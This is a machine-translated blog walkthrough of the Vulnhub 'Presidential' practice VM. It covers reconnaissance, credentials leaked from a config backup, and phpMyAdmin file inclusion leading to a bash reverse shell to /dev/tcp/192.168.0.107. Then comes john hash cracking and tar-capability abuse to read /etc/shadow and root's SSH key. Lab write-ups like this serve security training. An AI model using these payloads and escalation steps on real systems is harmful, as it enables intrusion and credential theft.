当前位置:网站首页>Vulnhub's presidential
Vulnhub's presidential
2022-07-03 11:47:00 【Plum_ Flowers_ seven】
Catalog
3、 ... and 、 Service version discovery
5、 ... and 、 Directory scanning
6、 ... and 、 Subdomain explosion
Nine 、john Of hash It's worth blasting
11、 ... and 、tars Raise the right
One 、nmap The host found
Make one based on ping Scan , Others are a little slow
Two 、 Port scanning
3、 ... and 、 Service version discovery
Four 、 information gathering
1. Home page
As for other functions , Source code division , It doesn't have much effect on us .
5、 ... and 、 Directory scanning
Check one by one , No response , The domain name is collected above , Bind domain name , Trying to .
1. Bind domain name
2./config.php.bak
This one has 107B The data of . Under the source code, we found the name of the database , Account and password
6、 ... and 、 Subdomain explosion
Burst out one database.votenow.local, binding ip, After the visit .
Find a phpmyadmin The login interface of , Combined with the account and password we found earlier , Sign in phpmyadmin.
7、 ... and 、phpmyadmin
1. View version
、
2. Vulnerability search
There are three loopholes , Let's use 44928.txt The file contains a vulnerability .
3. The contents of the document
First use the database to write files , Then let's use the file to contain the execution file
4. Try
Be careful : take sessions Change it to session, Otherwise it won't work
Write the domain name in front , Followed by session Just ok 了
8、 ... and 、 rebound shell
Log out and log in again to get a new session, The remaining steps are similar to the above
select '<?php system('bash -i >& /dev/tcp/192.168.0.107/8888 0>&1');exit;?>'
Nine 、john Of hash It's worth blasting
stay phpmyadmin We also found a user name and hash value
admin $2y$12$d/nOEjKNgk/epF2BeAFaMu8hW4ae3JJk8ITyh48q97awT/G7eQ11i
Try blasting
john hash --wordlist=rockyou.txt
Stella
su admin
and python Go back shell
Ten 、capability
1. View with capability Authority
getcap -r / 2>/dev/null
2. Means :
Permitted
This set defines the upper limit of privileges that a thread can have , yes Inheritable
and Effective
Superset of sets
Effective
When the kernel checks for privileged operations , Set of actual inspections ( You can add / Delete Effective
Medium capabilities
, To achieve temporary opening / Function of permission )
3. Check one by one
Find us admin Commands that users can execute .tars We can execute .
11、 ... and 、tars Raise the right
1. Read /etc/shadow
Read compression
tar -cf archive.tar /etc/shadow
decompression
tar -xf archive.tar
Use the inside root Of hash value , Find a dictionary to touch . Finding the right dictionary should be able to crack it
2. Read the private key file
Same as above tarS To read the file , Then decompress . Put it in admin Of .ssh below , And then through ssh Sign in , Mention right to success
ssh -i id_rsa [email protected] -p 2082
Get flag
边栏推荐
- R语言使用gridExtra包的grid.arrange函数将ggplot2包的多个可视化图像横向组合起来,ncol参数自定义组合图列数、nrow参数自定义组合图行数
- Sheet1$.输出[Excel 源输出].列[XXX] 出错。返回的列状态是:“文本被截断,或者一个或多个字符在目标代码页中没有匹配项。”。
- Mysql根据时间搜索常用方法整理
- vulnhub之Ripper
- 牛牛的组队竞赛
- repo ~ 常用命令
- Machine learning 3.2 decision tree model learning notes (to be supplemented)
- Web security summary
- STL Tutorial 9 deep copy and shallow copy of container elements
- Yintai department store ignites the city's "night economy"
猜你喜欢
cgroup简介
机器学习 3.2 决策树模型 学习笔记(待补)
The tutor put forward 20 pieces of advice to help graduate students successfully complete their studies: first, don't plan to take a vacation
Use typora to draw flow chart, sequence diagram, sequence diagram, Gantt chart, etc. for detailed explanation
(database authorization - redis) summary of unauthorized access vulnerabilities in redis
《剑指offer 04》二维数组查找
PHP Basics
Slam mapping and autonomous navigation simulation based on turnlebot3
Kibana - installation and configuration of kibana
同事写了一个责任链模式,bug无数...
随机推荐
小鹏 P7 撞护栏安全气囊未弹出,官方回应称撞击力度未达到弹出要求
简单工厂和工厂方法模式
Key switch: press FN when pressing F1-F12
ASP. Net hotel management system
《剑指offer 03》数组中重复的数字
C language utf8toutf16 (UTF-8 characters are converted to hexadecimal encoding)
抓包整理外篇fiddler———— 会话栏与过滤器[二]
repo ~ 常用命令
ORACLE进阶(一) 通过EXPDP IMPDP命令实现导dmp
Hongmeng third training (project training)
XML (DTD, XML parsing, XML modeling)
Hongmeng fourth training
Multi dimensional monitoring: the data base of intelligent monitoring
Software testing weekly (issue 78): the more confident you are about the future, the more patient you are about the present.
PHP Basics
Gut | Yu Jun group of the Chinese University of Hong Kong revealed that smoking changes intestinal flora and promotes colorectal cancer (do not smoke)
并发编程-单例
聊聊Flink框架中的状态管理机制
MCDF实验1
机器学习 3.2 决策树模型 学习笔记(待补)